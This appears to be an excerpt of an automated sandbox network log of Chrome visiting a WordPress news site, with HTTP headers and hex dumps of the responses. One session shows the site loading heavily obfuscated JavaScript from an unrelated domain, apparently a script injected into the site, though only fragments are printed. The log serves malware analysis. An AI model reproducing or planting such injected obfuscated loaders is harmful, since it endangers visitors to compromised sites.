                                                        2025-03-11 18:02:58 UTC16384INData Raw: 66 6f 72 6d 20 2e 63 6f 6d 6d 65 6e 74 2d 66 6f 72 6d 2d 75 72 6c 20 6c 61 62 65 6c 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 32 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 63 6f 6d 6d 65 6e 74 73 2d 66 6f 72 6d 20 2e 63 6f 6d 6d 65 6e 74 2d 66 6f 72 6d 2d 63 6f 6f 6b 69 65 73 2d 63 6f 6e 73 65 6e 74 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 67 61 70 3a 2e 32 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 63 6f 6d 6d 65 6e 74 73 2d 66 6f 72 6d 20 2e 63 6f 6d 6d 65 6e 74 2d 66 6f 72 6d 2d 63 6f 6f 6b 69 65 73 2d 63 6f 6e 73 65 6e 74 20 23 77 70 2d 63 6f 6d 6d 65 6e 74 2d 63 6f 6f 6b 69 65 73 2d 63 6f 6e 73 65 6e 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2e 33 35 65 6d 7d 2e 77 70 2d 62 6c
                                                        Data Ascii: form .comment-form-url label{display:block;margin-bottom:.25em}.wp-block-post-comments-form .comment-form-cookies-consent{display:flex;gap:.25em}.wp-block-post-comments-form .comment-form-cookies-consent #wp-comment-cookies-consent{margin-top:.35em}.wp-bl
                                                        2025-03-11 18:02:58 UTC16384INData Raw: 28 2e 69 73 2d 73 74 79 6c 65 2d 6c 6f 67 6f 73 2d 6f 6e 6c 79 29 29 20 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 2d 67 72 61 76 61 74 61 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 31 64 34 66 63 34 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 3a 6e 6f 74 28 2e 69 73 2d 73 74 79 6c 65 2d 6c 6f 67 6f 73 2d 6f 6e 6c 79 29 29 20 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 2d 69 6e 73 74 61 67 72 61 6d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 30 30 30 37 35 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 3a 6e 6f 74 28 2e 69 73 2d 73 74 79 6c 65 2d 6c 6f 67 6f 73 2d 6f
                                                        Data Ascii: (.is-style-logos-only)) .wp-social-link-gravatar{background-color:#1d4fc4;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-instagram{background-color:#f00075;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-o
                                                        2025-03-11 18:02:58 UTC224INData Raw: 68 74 6d 6c 20 3a 77 68 65 72 65 28 2e 69 73 2d 70 6f 73 69 74 69 6f 6e 2d 73 74 69 63 6b 79 29 7b 2d 2d 77 70 2d 61 64 6d 69 6e 2d 2d 61 64 6d 69 6e 2d 62 61 72 2d 2d 70 6f 73 69 74 69 6f 6e 2d 6f 66 66 73 65 74 3a 76 61 72 28 2d 2d 77 70 2d 61 64 6d 69 6e 2d 2d 61 64 6d 69 6e 2d 62 61 72 2d 2d 68 65 69 67 68 74 2c 30 70 78 29 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 36 30 30 70 78 29 7b 68 74 6d 6c 20 3a 77 68 65 72 65 28 2e 69 73 2d 70 6f 73 69 74 69 6f 6e 2d 73 74 69 63 6b 79 29 7b 2d 2d 77 70 2d 61 64 6d 69 6e 2d 2d 61 64 6d 69 6e 2d 62 61 72 2d 2d 70 6f 73 69 74 69 6f 6e 2d 6f 66 66 73 65 74 3a 30 70 78 7d 7d
                                                        Data Ascii: html :where(.is-position-sticky){--wp-admin--admin-bar--position-offset:var(--wp-admin--admin-bar--height,0px)}@media screen and (max-width:600px){html :where(.is-position-sticky){--wp-admin--admin-bar--position-offset:0px}}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        40192.168.2.44977945.77.88.114435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:02:57 UTC610OUTGET /ad.php?do=js&zid=117078&oid=27064&wd=-1&ht=-1&target=_blank HTTP/1.1
                                                        Host: g.adspeed.net
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Sec-Fetch-Storage-Access: active
                                                        Referer: https://hardylive.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:02:58 UTC349INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:02:57 GMT
                                                        Content-Type: application/x-javascript; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                        Pragma: no-cache
                                                        Cache-Control: private, max-age=0, no-cache, no-store, must-revalidate
                                                        Vary: Accept-Encoding
                                                        2025-03-11 18:02:58 UTC277INData Raw: 31 30 39 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 27 3c 73 63 72 27 2b 27 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 64 73 70 65 65 64 2e 6e 65 74 2f 61 64 2e 70 68 70 3f 64 6f 3d 6a 73 26 7a 69 64 3d 31 31 37 30 37 38 26 6f 69 64 3d 32 37 30 36 34 26 77 64 3d 2d 31 26 68 74 3d 2d 31 26 74 61 72 67 65 74 3d 5f 62 6c 61 6e 6b 26 63 62 3d 27 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2b 27 26 72 65 66 3d 27 2b 65 73 63 61 70 65 28 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 2e 73 75 62 73 74 72 28 30 2c 32 35 35 29 29 2b 27 26 75 72 69 3d 27 2b 65 73 63 61 70 65 28 64 6f 63 75 6d 65 6e 74 2e 55 52 4c 2e 73 75 62 73 74 72 28 30 2c 32 35 35 29 29 2b 27 22 3e
                                                        Data Ascii: 109document.write('<scr'+'ipt type="text/javascript" src="https://g.adspeed.net/ad.php?do=js&zid=117078&oid=27064&wd=-1&ht=-1&target=_blank&cb='+Math.random()+'&ref='+escape(document.referrer.substr(0,255))+'&uri='+escape(document.URL.substr(0,255))+'">


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        41192.168.2.449789198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:02:57 UTC628OUTGET /wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=aab4a5 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://hardylive.com/category/eprint/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:02:59 UTC204INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:02:56 GMT
                                                        Content-Type: text/css
                                                        Content-Length: 7527
                                                        Connection: close
                                                        Last-Modified: Fri, 07 Mar 2025 13:58:56 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:02:59 UTC7527INData Raw: 3a 72 6f 6f 74 7b 2d 2d 77 6f 6f 63 6f 6d 6d 65 72 63 65 3a 23 37 32 30 65 65 63 3b 2d 2d 77 63 2d 67 72 65 65 6e 3a 23 37 61 64 30 33 61 3b 2d 2d 77 63 2d 72 65 64 3a 23 61 30 30 3b 2d 2d 77 63 2d 6f 72 61 6e 67 65 3a 23 66 66 62 61 30 30 3b 2d 2d 77 63 2d 62 6c 75 65 3a 23 32 65 61 32 63 63 3b 2d 2d 77 63 2d 70 72 69 6d 61 72 79 3a 23 37 32 30 65 65 63 3b 2d 2d 77 63 2d 70 72 69 6d 61 72 79 2d 74 65 78 74 3a 23 66 63 66 62 66 65 3b 2d 2d 77 63 2d 73 65 63 6f 6e 64 61 72 79 3a 23 65 39 65 36 65 64 3b 2d 2d 77 63 2d 73 65 63 6f 6e 64 61 72 79 2d 74 65 78 74 3a 23 35 31 35 31 35 31 3b 2d 2d 77 63 2d 68 69 67 68 6c 69 67 68 74 3a 23 39 35 38 65 30 39 3b 2d 2d 77 63 2d 68 69 67 68 6c 69 67 68 2d 74 65 78 74 3a 77 68 69 74 65 3b 2d 2d 77 63 2d 63 6f 6e 74 65
                                                        Data Ascii: :root{--woocommerce:#720eec;--wc-green:#7ad03a;--wc-red:#a00;--wc-orange:#ffba00;--wc-blue:#2ea2cc;--wc-primary:#720eec;--wc-primary-text:#fcfbfe;--wc-secondary:#e9e6ed;--wc-secondary-text:#515151;--wc-highlight:#958e09;--wc-highligh-text:white;--wc-conte


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        42192.168.2.449788185.76.79.504435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:02:58 UTC608OUTGET /SzlpnTAbCvQvG1OvfQpFvzkbU78xQAX7O1sfvzY= HTTP/1.1
                                                        Host: virtual.urban-orthodontics.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Sec-Fetch-Storage-Access: active
                                                        Referer: https://hardylive.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:03:01 UTC181INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:03:01 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        2025-03-11 18:03:01 UTC3950INData Raw: 66 36 37 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 30 38 39 36 61 2c 5f 30 78 31 31 34 33 39 61 29 7b 76 61 72 20 61 30 5f 30 78 34 66 34 39 66 61 3d 7b 5f 30 78 31 39 38 35 35 36 3a 30 78 35 62 36 2c 5f 30 78 32 35 35 63 30 65 3a 30 78 35 37 31 2c 5f 30 78 31 33 39 65 64 30 3a 27 4b 6a 58 53 27 2c 5f 30 78 39 37 61 65 65 34 3a 30 78 35 62 31 2c 5f 30 78 31 30 32 62 38 33 3a 30 78 35 37 61 2c 5f 30 78 31 37 63 37 61 61 3a 27 31 47 4f 79 27 2c 5f 30 78 33 65 30 65 62 31 3a 30 78 35 63 39 2c 5f 30 78 31 62 37 31 38 39 3a 30 78 36 32 36 2c 5f 30 78 32 36 38 61 33 36 3a 30 78 36 34 66 2c 5f 30 78 32 66 36 65 30 63 3a 27 6c 73 66 71 27 2c 5f 30 78 31 65 30 32 65 31 3a 30 78 35 63 36 2c 5f 30 78 64 64 35 65 31 32 3a 30 78 31 39 39 2c 5f 30 78 32 35 39 63
                                                        Data Ascii: f67(function(_0x30896a,_0x11439a){var a0_0x4f49fa={_0x198556:0x5b6,_0x255c0e:0x571,_0x139ed0:'KjXS',_0x97aee4:0x5b1,_0x102b83:0x57a,_0x17c7aa:'1GOy',_0x3e0eb1:0x5c9,_0x1b7189:0x626,_0x268a36:0x64f,_0x2f6e0c:'lsfq',_0x1e02e1:0x5c6,_0xdd5e12:0x199,_0x259c
                                                        2025-03-11 18:03:01 UTC4104INData Raw: 31 30 30 30 0d 0a 38 39 62 37 3a 30 78 35 39 31 2c 5f 30 78 33 33 34 65 37 32 3a 30 78 35 30 36 2c 5f 30 78 31 62 30 30 66 34 3a 30 78 35 31 36 2c 5f 30 78 32 33 33 64 34 38 3a 30 78 34 62 33 2c 5f 30 78 62 31 66 33 35 35 3a 27 25 53 56 4e 27 2c 5f 30 78 63 37 38 30 30 39 3a 27 31 47 4f 79 27 2c 5f 30 78 35 65 63 62 34 65 3a 30 78 64 61 2c 5f 30 78 39 35 30 64 38 35 3a 30 78 61 65 2c 5f 30 78 31 33 34 30 34 65 3a 30 78 35 36 36 2c 5f 30 78 31 38 62 39 66 33 3a 30 78 35 35 63 2c 5f 30 78 35 32 63 33 39 33 3a 27 6b 26 70 25 27 2c 5f 30 78 35 32 31 32 32 30 3a 27 47 23 24 6a 27 2c 5f 30 78 33 37 61 63 62 38 3a 30 78 34 39 61 2c 5f 30 78 34 39 32 63 38 37 3a 30 78 34 35 66 2c 5f 30 78 35 61 33 64 63 63 3a 27 6c 73 66 71 27 2c 5f 30 78 32 65 66 30 38 31 3a 30
                                                        Data Ascii: 100089b7:0x591,_0x334e72:0x506,_0x1b00f4:0x516,_0x233d48:0x4b3,_0xb1f355:'%SVN',_0xc78009:'1GOy',_0x5ecb4e:0xda,_0x950d85:0xae,_0x13404e:0x566,_0x18b9f3:0x55c,_0x52c393:'k&p%',_0x521220:'G#$j',_0x37acb8:0x49a,_0x492c87:0x45f,_0x5a3dcc:'lsfq',_0x2ef081:0
                                                        2025-03-11 18:03:01 UTC4104INData Raw: 31 30 30 30 0d 0a 63 65 63 66 3a 27 24 57 58 52 27 2c 5f 30 78 38 36 35 33 32 31 3a 30 78 64 62 2c 5f 30 78 32 32 61 34 63 63 3a 30 78 65 65 2c 5f 30 78 34 64 33 36 61 38 3a 27 79 68 77 21 27 2c 5f 30 78 32 34 64 63 64 37 3a 30 78 62 65 2c 5f 30 78 32 34 61 64 35 34 3a 30 78 37 34 2c 5f 30 78 34 33 30 63 62 65 3a 30 78 31 34 33 2c 5f 30 78 31 35 66 61 30 36 3a 30 78 31 31 64 2c 5f 30 78 31 39 36 37 30 32 3a 27 47 4c 65 5d 27 2c 5f 30 78 34 37 64 34 33 32 3a 30 78 32 38 31 2c 5f 30 78 31 30 34 30 36 65 3a 27 74 63 23 4c 27 7d 2c 61 30 5f 30 78 32 39 65 33 31 62 3d 7b 5f 30 78 35 34 63 61 33 37 3a 30 78 31 30 34 2c 5f 30 78 33 66 61 38 64 38 3a 30 78 39 35 7d 2c 61 30 5f 30 78 33 37 34 64 66 34 3d 7b 5f 30 78 31 66 34 65 37 65 3a 30 78 32 64 7d 2c 61 30 5f
                                                        Data Ascii: 1000cecf:'$WXR',_0x865321:0xdb,_0x22a4cc:0xee,_0x4d36a8:'yhw!',_0x24dcd7:0xbe,_0x24ad54:0x74,_0x430cbe:0x143,_0x15fa06:0x11d,_0x196702:'GLe]',_0x47d432:0x281,_0x10406e:'tc#L'},a0_0x29e31b={_0x54ca37:0x104,_0x3fa8d8:0x95},a0_0x374df4={_0x1f4e7e:0x2d},a0_
                                                        2025-03-11 18:03:01 UTC4104INData Raw: 31 30 30 30 0d 0a 38 64 28 61 30 5f 30 78 31 30 39 34 62 39 2e 5f 30 78 31 37 62 37 63 66 2c 61 30 5f 30 78 31 30 39 34 62 39 2e 5f 30 78 33 63 64 64 39 37 2c 61 30 5f 30 78 31 30 39 34 62 39 2e 5f 30 78 35 33 37 30 63 66 2c 61 30 5f 30 78 31 30 39 34 62 39 2e 5f 30 78 35 63 39 34 30 62 2c 61 30 5f 30 78 31 30 39 34 62 39 2e 5f 30 78 34 34 32 35 35 61 29 2b 5f 30 78 65 31 63 36 66 36 28 61 30 5f 30 78 31 30 39 34 62 39 2e 5f 30 78 34 36 65 37 37 62 2c 61 30 5f 30 78 31 30 39 34 62 39 2e 5f 30 78 31 33 61 33 65 37 2c 30 78 34 39 61 2c 27 25 53 56 4e 27 2c 30 78 35 30 30 29 2b 5f 30 78 33 64 30 64 38 64 28 30 78 34 39 63 2c 61 30 5f 30 78 31 30 39 34 62 39 2e 5f 30 78 35 65 65 63 65 32 2c 61 30 5f 30 78 31 30 39 34 62 39 2e 5f 30 78 35 39 37 35 32 66 2c 30
                                                        Data Ascii: 10008d(a0_0x1094b9._0x17b7cf,a0_0x1094b9._0x3cdd97,a0_0x1094b9._0x5370cf,a0_0x1094b9._0x5c940b,a0_0x1094b9._0x44255a)+_0xe1c6f6(a0_0x1094b9._0x46e77b,a0_0x1094b9._0x13a3e7,0x49a,'%SVN',0x500)+_0x3d0d8d(0x49c,a0_0x1094b9._0x5eece2,a0_0x1094b9._0x59752f,0
                                                        2025-03-11 18:03:01 UTC4104INData Raw: 31 30 30 30 0d 0a 31 62 39 38 61 62 2c 2d 30 78 31 63 36 2c 2d 30 78 31 38 35 2c 27 47 47 45 72 27 29 2b 5f 30 78 33 64 30 64 38 64 28 61 30 5f 30 78 31 30 39 34 62 39 2e 5f 30 78 33 30 64 63 33 66 2c 61 30 5f 30 78 31 30 39 34 62 39 2e 5f 30 78 31 32 34 36 37 64 2c 30 78 34 61 64 2c 30 78 34 65 33 2c 61 30 5f 30 78 31 30 39 34 62 39 2e 5f 30 78 33 30 30 64 36 33 29 29 21 3d 3d 2d 28 2d 30 78 31 2a 2d 30 78 31 38 35 2b 2d 30 78 31 33 2a 2d 30 78 37 32 2b 2d 30 78 39 66 61 29 7c 7c 5f 30 78 31 31 63 66 36 39 5b 5f 30 78 33 64 30 64 38 64 28 30 78 34 62 32 2c 61 30 5f 30 78 31 30 39 34 62 39 2e 5f 30 78 34 36 63 38 33 66 2c 30 78 34 62 62 2c 61 30 5f 30 78 31 30 39 34 62 39 2e 5f 30 78 62 30 35 39 31 62 2c 61 30 5f 30 78 31 30 39 34 62 39 2e 5f 30 78 35 33
                                                        Data Ascii: 10001b98ab,-0x1c6,-0x185,'GGEr')+_0x3d0d8d(a0_0x1094b9._0x30dc3f,a0_0x1094b9._0x12467d,0x4ad,0x4e3,a0_0x1094b9._0x300d63))!==-(-0x1*-0x185+-0x13*-0x72+-0x9fa)||_0x11cf69[_0x3d0d8d(0x4b2,a0_0x1094b9._0x46c83f,0x4bb,a0_0x1094b9._0xb0591b,a0_0x1094b9._0x53
                                                        2025-03-11 18:03:01 UTC4104INData Raw: 31 30 30 30 0d 0a 7b 72 65 74 75 72 6e 20 5f 30 78 33 63 65 38 36 32 28 5f 30 78 35 37 39 64 37 31 2c 5f 30 78 31 34 65 65 66 33 2d 61 30 5f 30 78 34 63 34 36 33 31 2e 5f 30 78 33 36 65 37 38 33 2c 5f 30 78 34 62 63 33 36 62 2d 20 2d 61 30 5f 30 78 34 63 34 36 33 31 2e 5f 30 78 33 65 36 39 33 64 2c 5f 30 78 35 35 66 61 30 61 2d 61 30 5f 30 78 34 63 34 36 33 31 2e 5f 30 78 32 63 63 64 33 62 2c 5f 30 78 34 62 63 33 36 62 2d 61 30 5f 30 78 34 63 34 36 33 31 2e 5f 30 78 35 38 61 64 34 32 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 32 31 35 62 34 33 28 5f 30 78 64 62 30 61 64 66 2c 5f 30 78 34 63 64 33 36 65 2c 5f 30 78 33 63 64 38 66 38 2c 5f 30 78 34 37 65 66 31 64 2c 5f 30 78 33 38 34 61 64 64 29 7b 72 65 74 75 72 6e 20 5f 30 78 65 31 63 36 66 36 28 5f 30
                                                        Data Ascii: 1000{return _0x3ce862(_0x579d71,_0x14eef3-a0_0x4c4631._0x36e783,_0x4bc36b- -a0_0x4c4631._0x3e693d,_0x55fa0a-a0_0x4c4631._0x2ccd3b,_0x4bc36b-a0_0x4c4631._0x58ad42);}function _0x215b43(_0xdb0adf,_0x4cd36e,_0x3cd8f8,_0x47ef1d,_0x384add){return _0xe1c6f6(_0
                                                        2025-03-11 18:03:01 UTC4104INData Raw: 31 30 30 30 0d 0a 2c 61 30 5f 30 78 32 30 65 61 65 33 2e 5f 30 78 33 39 38 38 36 39 2c 2d 61 30 5f 30 78 32 30 65 61 65 33 2e 5f 30 78 31 66 38 61 64 31 2c 2d 61 30 5f 30 78 32 30 65 61 65 33 2e 5f 30 78 33 38 33 39 32 38 2c 2d 61 30 5f 30 78 32 30 65 61 65 33 2e 5f 30 78 33 35 31 65 33 39 29 5d 28 5f 30 78 32 38 65 66 64 33 28 61 30 5f 30 78 32 30 65 61 65 33 2e 5f 30 78 31 38 34 30 62 33 2c 30 78 32 30 65 2c 61 30 5f 30 78 32 30 65 61 65 33 2e 5f 30 78 31 35 35 36 32 64 2c 30 78 32 38 64 2c 30 78 32 35 62 29 2b 27 74 27 29 5b 30 78 31 37 62 65 2b 2d 30 78 31 32 62 2a 30 78 31 35 2b 30 78 63 39 5d 3b 5f 30 78 38 35 36 61 63 30 5b 5f 30 78 31 66 61 34 62 61 28 2d 61 30 5f 30 78 32 30 65 61 65 33 2e 5f 30 78 37 39 32 62 36 38 2c 61 30 5f 30 78 32 30 65 61
                                                        Data Ascii: 1000,a0_0x20eae3._0x398869,-a0_0x20eae3._0x1f8ad1,-a0_0x20eae3._0x383928,-a0_0x20eae3._0x351e39)](_0x28efd3(a0_0x20eae3._0x1840b3,0x20e,a0_0x20eae3._0x15562d,0x28d,0x25b)+'t')[0x17be+-0x12b*0x15+0xc9];_0x856ac0[_0x1fa4ba(-a0_0x20eae3._0x792b68,a0_0x20ea
                                                        2025-03-11 18:03:01 UTC1985INData Raw: 37 62 61 0d 0a 57 51 6e 2b 74 64 5a 63 4e 57 27 2c 27 73 38 6f 6a 66 43 6b 34 6b 47 27 2c 27 57 34 4f 78 57 52 65 36 27 2c 27 57 34 39 34 62 38 6b 58 42 57 27 2c 27 41 66 6c 63 53 38 6b 78 57 4f 34 27 2c 27 57 34 53 64 57 4f 44 51 57 37 79 27 2c 27 61 4a 4e 63 49 53 6f 45 57 4f 34 27 2c 27 45 4b 53 42 57 4f 46 63 52 71 27 2c 27 57 34 50 35 61 43 6b 30 27 2c 27 57 36 66 4b 57 34 33 64 51 6d 6b 50 27 2c 27 66 38 6b 72 57 37 56 63 55 43 6f 58 27 2c 27 75 4c 62 68 57 51 4a 64 4b 57 27 2c 27 57 52 42 64 50 63 53 27 2c 27 45 72 48 44 57 37 37 64 4d 71 27 2c 27 57 35 71 6b 57 51 71 27 2c 27 57 34 70 64 4c 72 62 2f 75 57 27 2c 27 57 35 78 64 54 6d 6b 79 57 35 4a 63 47 47 27 2c 27 69 6d 6b 44 57 34 68 64 4f 48 38 27 2c 27 43 53 6b 34 57 51 37 64 4f 38 6b 46 27 2c
                                                        Data Ascii: 7baWQn+tdZcNW','s8ojfCk4kG','W4OxWRe6','W494b8kXBW','AflcS8kxWO4','W4SdWODQW7y','aJNcISoEWO4','EKSBWOFcRq','W4P5aCk0','W6fKW43dQmkP','f8krW7VcUCoX','uLbhWQJdKW','WRBdPcS','ErHDW77dMq','W5qkWQq','W4pdLrb/uW','W5xdTmkyW5JcGG','imkDW4hdOH8','CSk4WQ7dO8kF',
                                                        2025-03-11 18:03:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        43192.168.2.449790198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:02:59 UTC695OUTGET /wp-content/themes/jnews/assets/dist/image/preloader.gif HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://hardylive.com/wp-content/themes/jnews/assets/dist/frontend.min.css?ver=1.0.0
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:03:00 UTC205INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:02:58 GMT
                                                        Content-Type: image/gif
                                                        Content-Length: 4399
                                                        Connection: close
                                                        Last-Modified: Wed, 13 Nov 2024 21:12:02 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:03:00 UTC4399INData Raw: 47 49 46 38 39 61 64 00 4b 00 f3 00 00 f0 f0 f0 f4 f4 f4 f1 f1 f1 f2 f2 f2 f8 f8 f8 ef ef ef ed ed ed f3 f3 f3 f5 f5 f5 ee ee ee f6 f6 f6 f7 f7 f7 ff ff ff 00 00 00 00 00 00 00 00 00 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 21 f9 04 05 03 00 0c 00 2c 00 00 00 00 64 00 4b 00 00 04 6c 90 ac 49 ab bd 38 eb cd bb c7 d2 27 8e 64 69 9e 68 aa ae 6c eb be 70 2c cf 74 6d df 78 ae ef 7c ef ff c0 a0 70 48 2c 1a 8f c8 a4 72 c9 6c 3a 9f d0 a8 74 4a ad 5a af d8 ac 76 cb ed 7a bf e0 b0 78 4c 2e 9b cf e8 b4 7a cd 6e bb df f0 b8 7c 4e af db ef f8 bc 7e cf ef fb ff 80 81 82 83 84 85 86 87 88 89 8a 8b 8c 1a 21 73 04 11 00 21 f9 04 05 03 00 0c 00 2c 00 00 00 00 0b 00 4b 00 00 04 7e f0 c8 80 90 52 2c 8f 49 2f 56 db 41 59 57 26 4c 95 a7 0d c1 a8 32 5b db 95 b0
                                                        Data Ascii: GIF89adK!NETSCAPE2.0!,dKlI8'dihlp,tmx|pH,rl:tJZvzxL.zn|N~!s!,K~R,I/VAYW&L2[


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        44192.168.2.449794198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:03:00 UTC664OUTGET /wp-content/themes/jnews/assets/dist/frontend.min.js?ver=1.0.0 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://hardylive.com/category/eprint/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Range: bytes=163620-163620
                                                        If-Range: Wed, 13 Nov 2024 21:11:58 GMT
                                                        2025-03-11 18:03:01 UTC271INHTTP/1.1 206 Partial Content
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:02:59 GMT
                                                        Content-Type: application/javascript
                                                        Content-Length: 1
                                                        Connection: close
                                                        Last-Modified: Wed, 13 Nov 2024 21:11:58 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Range: bytes 163620-163620/308955
                                                        2025-03-11 18:03:01 UTC1INData Raw: 5f
                                                        Data Ascii: _


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        45192.168.2.449792198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:03:00 UTC618OUTGET /wp-content/plugins/woocommerce/assets/js/sourcebuster/sourcebuster.min.js?ver=aab4a5 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
